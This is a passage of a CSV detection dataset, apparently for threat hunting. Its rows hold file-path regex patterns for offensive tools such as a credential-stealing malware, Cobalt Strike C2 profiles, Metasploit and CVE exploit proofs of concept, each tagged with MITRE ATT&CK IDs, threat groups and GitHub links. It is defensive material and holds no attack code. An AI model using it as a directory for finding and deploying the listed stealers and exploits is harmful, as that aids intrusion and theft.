victims","T1176 - T1219 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/mandatoryprogrammer/CursedChrome","1","1","N/A","N/A","10","10","1533","226","2024-10-26T19:06:54Z","2020-04-26T20:55:05Z","6341" 
"*/cursorinit.vbs*",".{0,1000}\/cursorinit\.vbs.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","1","N/A","N/A","10","","N/A","","","","6342" "*/custom_crack_list.txt*",".{0,1000}\/custom_crack_list\.txt.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","6343" "*/custom_payload_generator/*",".{0,1000}\/custom_payload_generator\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Various Aggressor Scripts I've Created.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - 
Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/offsecginger/AggressorScripts","1","1","N/A","N/A","10","10","149","30","2022-01-01T19:04:27Z","2018-11-30T03:14:45Z","6344" "*/customPayload/*",".{0,1000}\/customPayload\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","6345" "*/CVE-*-*_POC.py*",".{0,1000}\/CVE\-.{0,1000}\-.{0,1000}_POC\.py.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","0","#linux","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","6346" "*/CVE-*.bin",".{0,1000}\/CVE\-.{0,1000}\.bin","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","6347" "*/CVE-*.jar",".{0,1000}\/CVE\-.{0,1000}\.jar","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","6348" "*/CVE*/chocobo_root*",".{0,1000}\/CVE.{0,1000}\/chocobo_root.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","6349" "*/CVE-*_EXPLOIT_0DAY/*",".{0,1000}\/CVE\-.{0,1000}_EXPLOIT_0DAY\/.{0,1000}","offensive_tool_keyword","poc","Exploit for the CVE-2023-23399","T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550","TA0003 - TA0002 - TA0004","N/A","N/A","Exploitation tool","https://github.com/sqrtZeroKnowledge/CVE-2023-23397_EXPLOIT_0DAY","1","1","N/A","N/A","N/A","2","161","41","2023-03-15T17:53:53Z","2023-03-15T17:03:38Z","6350" "*/CVE-*x64.exe",".{0,1000}\/CVE\-.{0,1000}x64\.exe","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. 
identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","6351" "*/CVE-*x86.exe",".{0,1000}\/CVE\-.{0,1000}x86\.exe","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","6352" "*/CVE-2009-2698/katon.c*",".{0,1000}\/CVE\-2009\-2698\/katon\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","6353" "*/cve-2014-4113.x64.dll*",".{0,1000}\/cve\-2014\-4113\.x64\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","6354" "*/cve-2014-4113.x86.dll*",".{0,1000}\/cve\-2014\-4113\.x86\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 
- T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","6355" "*/cve-2015-1701.x64.dll*",".{0,1000}\/cve\-2015\-1701\.x64\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","6356" "*/cve-2015-1701.x86.dll*",".{0,1000}\/cve\-2015\-1701\.x86\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","6357" "*/cve-2016-0051.x86.dll*",".{0,1000}\/cve\-2016\-0051\.x86\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","6358" "*/CVE-2020-0796.x64.dll*",".{0,1000}\/CVE\-2020\-0796\.x64\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","6359" "*/CVE-2021-1675.git*",".{0,1000}\/CVE\-2021\-1675\.git.{0,1000}","offensive_tool_keyword","PrintNightmare","PrintNightmare exploitation","T1210 - T1059.001 - T1548.002","TA0001 - TA0002 - TA0004","N/A","Dispossessor","Privilege 
Escalation","https://github.com/cube0x0/CVE-2021-1675","1","1","N/A","N/A","10","10","1879","582","2021-07-20T15:28:13Z","2021-06-29T17:24:14Z","6360" "*/CVE-2021-1675.x64.dll*",".{0,1000}\/CVE\-2021\-1675\.x64\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","6361" "*/CVE-2021-21972.git*",".{0,1000}\/CVE\-2021\-21972\.git.{0,1000}","offensive_tool_keyword","POC","CVE-2021-21972 POC exploitation","T1190 - T1059.001 - T1040","TA0001 - TA0003 - TA0009","N/A","Dispossessor","Exploitation tool","https://github.com/NS-Sp4ce/CVE-2021-21972","1","1","N/A","N/A","7","5","491","146","2023-06-08T04:01:33Z","2021-02-24T11:14:58Z","6362" "*/CVE-2021-21985_PoC.git*",".{0,1000}\/CVE\-2021\-21985_PoC\.git.{0,1000}","offensive_tool_keyword","POC","CVE-2021-21985 POC exploitation","T1190 - T1059.001 - T1040","TA0001 - TA0003 - TA0009","N/A","Dispossessor","Exploitation tool","https://github.com/sknux/CVE-2021-21985_PoC","1","1","N/A","N/A","7","1","3","1","2021-11-09T19:14:55Z","2021-11-09T19:06:29Z","6363" "*/CVE-2022-*.git*",".{0,1000}\/CVE\-2022\-.{0,1000}\.git.{0,1000}","offensive_tool_keyword","POC","POC exploit pattern from github","T1203 - T1218 - T1059 - T1064 - T1204","TA0001 - TA0002","N/A","N/A","Exploitation tool","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6364" 
"*/CVE-2022-*.go*",".{0,1000}\/CVE\-2022\-.{0,1000}\.go.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","0","#linux","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","6365" "*/CVE-2022-0847.c*",".{0,1000}\/CVE\-2022\-0847\.c.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1204 - T1055 - T1003 - T1015 - T1068 - T1059 - T1047","TA0001 - TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/4luc4rdr5290/CVE-2022-0847","1","1","N/A","N/A","N/A","1","4","2","2022-03-08T20:41:15Z","2022-03-08T20:18:28Z","6366" "*/CVE-2022-0847/write_anything.c*",".{0,1000}\/CVE\-2022\-0847\/write_anything\.c.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0008","N/A","N/A","Exploitation tool","https://github.com/gyaansastra/CVE-2022-0847","1","1","N/A","N/A","N/A","1","2","2","2022-03-20T15:46:04Z","2022-03-09T15:44:58Z","6367" "*/CVE-2022-0847-dirty-pipe-checker*",".{0,1000}\/CVE\-2022\-0847\-dirty\-pipe\-checker.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/basharkey/CVE-2022-0847-dirty-pipe-checker","1","1","N/A","N/A","N/A","1","67","29","2023-06-14T23:25:46Z","2022-03-08T17:13:24Z","6368" "*/CVE-2022-0847-DirtyPipe-Exploit*",".{0,1000}\/CVE\-2022\-0847\-DirtyPipe\-Exploit.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation 
tool","https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit","1","1","N/A","N/A","N/A","10","1099","221","2022-03-08T06:20:05Z","2022-03-07T18:55:20Z","6369" "*/CVE-2022-0847-dirty-pipe-exploit*",".{0,1000}\/CVE\-2022\-0847\-dirty\-pipe\-exploit.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/cspshivam/CVE-2022-0847-dirty-pipe-exploit","1","1","N/A","N/A","N/A","1","1","3","2022-03-08T11:15:00Z","2022-03-08T10:40:07Z","6370" "*/CVE-2022-0847-Docker*",".{0,1000}\/CVE\-2022\-0847\-Docker.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/mrchucu1/CVE-2022-0847-Docker","1","1","N/A","N/A","N/A","1","0","1","2022-03-08T17:05:01Z","2022-03-08T17:02:40Z","6371" "*/cve-2022-23131-exp/blob/main/zabbix.py*",".{0,1000}\/cve\-2022\-23131\-exp\/blob\/main\/zabbix\.py.{0,1000}","offensive_tool_keyword","POC","POC exploitation of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0003 - TA0002","N/A","N/A","Exploitation tool","https://github.com/random-robbie/cve-2022-23131-exp","1","1","N/A","N/A","N/A","1","8","7","2022-02-23T16:37:13Z","2022-02-23T16:34:03Z","6372" "*/CVE-2022-26809-RCE*",".{0,1000}\/CVE\-2022\-26809\-RCE.{0,1000}","offensive_tool_keyword","POC","Remote Code Execution Exploit in the RPC Library CVE-2022-26809","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/websecnl/CVE-2022-26809","1","1","N/A","N/A","N/A","1","26","3","2022-04-19T17:04:04Z","2022-04-14T08:12:24Z","6373" "*/CVE-2023-*.git*",".{0,1000}\/CVE\-2023\-.{0,1000}\.git.{0,1000}","offensive_tool_keyword","POC","POC exploit pattern from github","T1203 - T1218 - 
T1059 - T1064 - T1204","TA0001 - TA0002","N/A","N/A","Exploitation tool","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6374" "*/CVE-2023-34362.git*",".{0,1000}\/CVE\-2023\-34362\.git.{0,1000}","offensive_tool_keyword","POC","CVE-2023-34362: MOVEit Transfer Unauthenticated RCE","T1190.001 - T1210.002 - T1068 - T1059.001 - T1059.003","TA0005 - TA0001 - TA0002 - TA0043","N/A","N/A","Exploitation tool","https://github.com/sfewer-r7/CVE-2023-34362","1","1","N/A","N/A","N/A","1","64","23","2024-03-24T00:46:38Z","2023-06-12T12:56:12Z","6375" "*/CVE-2023-38831-RaRCE*",".{0,1000}\/CVE\-2023\-38831\-RaRCE.{0,1000}","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","1","N/A","N/A","9","2","115","18","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z","6376" "*/CVE-2024-1086.git*",".{0,1000}\/CVE\-2024\-1086\.git.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","1","#linux","CVE-2024-1086 POC","10","10","2357","314","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z","6377" "*/CVE-2024-21338.git*",".{0,1000}\/CVE\-2024\-21338\.git.{0,1000}","offensive_tool_keyword","POC","Local Privilege Escalation from Admin to Kernel vulnerability on Windows 10 and Windows 11 operating systems with HVCI enabled.","T1055.011 - T1548.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/hakaioffsec/CVE-2024-21338","1","1","N/A","N/A","9","3","292","60","2024-04-16T21:00:14Z","2024-04-13T05:53:02Z","6378" 
"*/CVE-2024-22274-RCE.git*",".{0,1000}\/CVE\-2024\-22274\-RCE\.git.{0,1000}","offensive_tool_keyword","POC","PoC - Authenticated Remote Code Execution in VMware vCenter Server (CVE-2024-22274 Exploit)","T1213 - T1059 - T1056 - T1078 - T1578","TA0001 - TA0002 - TA0008 - TA0009","N/A","N/A","Lateral Movement","https://github.com/l0n3m4n/CVE-2024-22274-RCE","1","1","N/A","N/A","10","1","42","8","2024-07-16T23:22:14Z","2024-07-15T07:26:59Z","6379" "*/CVE-2024-49138-POC.git*",".{0,1000}\/CVE\-2024\-49138\-POC\.git.{0,1000}","offensive_tool_keyword","POC","Windows Privilege escalation POC exploitation for CVE-2024-49138","T1068 - T1058 - T1203","TA0004","N/A","N/A","Privilege Escalation","https://github.com/emdnaia/CVE-2024-49138-POC","1","1","N/A","N/A","9","1","1","0","2025-01-15T01:01:21Z","2025-01-15T02:11:49Z","6380" "*/cvs-brute.nse*",".{0,1000}\/cvs\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6381" "*/cvs-brute-repository.nse*",".{0,1000}\/cvs\-brute\-repository\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6382" "*/CWoNaJLBo/VTNeWw11212/*",".{0,1000}\/CWoNaJLBo\/VTNeWw11212\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat 
Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","1531","425","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z","6383" "*/CWoNaJLBo/VTNeWw11213/*",".{0,1000}\/CWoNaJLBo\/VTNeWw11213\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - 